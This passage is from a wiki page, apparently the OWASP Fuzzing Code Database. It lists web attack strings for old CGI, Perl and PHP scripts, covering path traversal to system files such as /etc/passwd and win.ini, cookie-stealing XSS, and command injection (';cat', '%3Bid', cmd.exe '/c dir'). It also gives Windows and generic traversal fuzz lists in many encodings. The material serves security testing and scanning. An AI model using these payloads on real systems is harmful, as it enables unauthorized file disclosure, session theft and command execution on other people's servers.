search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Windows Directory Traversal   (Update: 17 March 2010  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Windows Directory Traversal   (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
